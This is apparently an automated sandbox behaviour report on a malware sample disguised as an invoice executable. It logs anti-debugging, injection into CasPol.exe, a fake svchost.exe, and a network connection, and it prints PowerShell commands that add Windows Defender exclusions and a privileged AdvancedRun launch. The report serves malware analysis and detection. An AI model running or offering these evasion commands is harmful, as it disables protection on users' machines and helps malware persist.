        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
        Source: WerFault.exe, 00000011.00000002.837375808.0000000004528000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,000000000_2_08A269B0
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040289F
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeNetwork Connect: 172.67.172.17 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -ForceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 79C008Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,3_2_00401C26
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.943989994.0000000002E8E000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: CasPol.exe, 0000000D.00000002.941774576.0000000002CF8000.00000004.00000001.sdmpBinary or memory string: Program Managerx
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: Program Manager`
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
